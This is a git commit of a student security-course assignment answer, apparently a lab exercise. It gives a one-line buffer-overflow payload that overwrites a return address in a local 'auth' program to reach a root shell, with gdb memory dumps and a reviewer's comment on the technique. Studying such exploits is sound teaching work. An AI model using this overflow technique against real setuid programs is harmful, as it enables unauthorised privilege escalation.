| author | Camil Staps | 2015-11-30 22:08:58 +0100 |
|---|---|---|
| committer | Camil Staps | 2015-11-30 22:08:58 +0100 |
| commit | d7c4536c91ddd307fc9b99984ac49b5b5459b485 (patch) | |
| tree | 135749c25cda6177b7712ae425d9559b625f20e0 /CamilStaps-s4498062-Assignment-3/ex4 | |
| parent | Initial commit (diff) | |
Assignment 2, 3
Diffstat (limited to 'CamilStaps-s4498062-Assignment-3/ex4')
-rw-r--r-- | CamilStaps-s4498062-Assignment-3/ex4 | 47 |
1 files changed, 47 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-3/ex4 b/CamilStaps-s4498062-Assignment-3/ex4 new file mode 100644 index 0000000..47214a6 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-3/ex4 
@@ -0,0 +1,47 @@ +a + That would be 0x40085a. + +b + Done. That gives a root shell: + + $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')" + ERROR: password incorrect + # + Segmentation fault + +c + The return address of checkpass has been overwritten with the address of the + setuid call. So, after executing checkpass as normally, we 'return' to that + setuid call. This explains why we don't read "Starting root shell". + + (gdb) ... + 0x000000000040082d 14 strcpy(password,input); + 0x000000000040082a <checkpass+10>: 48 89 e7 mov rdi,rsp + => 0x000000000040082d <checkpass+13>: e8 0e fe ff ff call 0x400640 <strcpy@plt> + (gdb) x /64bx ($rsp+256) + 0x7ffe5af18c50: 0x40 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00 + --> 0x7ffe5af18c58: 0xf2 0x06 0x40 0x00 0x00 0x00 0x00 0x00 + 0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + 0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00 + 0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + 0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00 + 0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00 + 0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00 + (gdb) ni + 15 hash1 = crypt(password,"$6$1122334455667788$"); + => 0x0000000000400832 <checkpass+18>: be 24 09 40 00 mov esi,0x400924 + 0x0000000000400837 <checkpass+23>: 48 89 e7 mov rdi,rsp + 0x000000000040083a <checkpass+26>: e8 41 fe ff ff call 0x400680 <crypt@plt> + (gdb) x /64bx ($rsp+256) + 0x7ffe5af18c50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 + --> 0x7ffe5af18c58: 0x5a 0x08 0x40 0x00 0x00 0x00 0x00 0x00 + 0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + 0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00 + 0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 + 0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00 + 0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00 + 0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00 + + The relevant line is marked with -->. 
Before the strcpy, the correct return + address is there. After, there is our own address. + |
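Review bot: the explanation in part (c) misses why the overwrite in part (b) works at all: the payload ends in struct.pack("<Q",0x40085a), i.e. 5a 08 40 00 00 00 00 00, but an argv string cannot carry NUL bytes (and bash drops them from "$(...)" output) and strcpy stops at the first 0x00, so only the three bytes 5a 08 40 are ever written over the saved return address. It succeeds only because the original value f2 06 40 00 00 00 00 00 at 0x7ffe5af18c58 already had zeros in its upper five bytes, which is exactly what the two "-->" dumps show; one sentence stating this would make the "Before the strcpy, the correct return address is there. After, there is our own address." conclusion precise. Smaller point: part (a) answers "That would be 0x40085a." without saying what that address is; the reader only learns in (c) that it is "the address of the setuid call", so say so in (a).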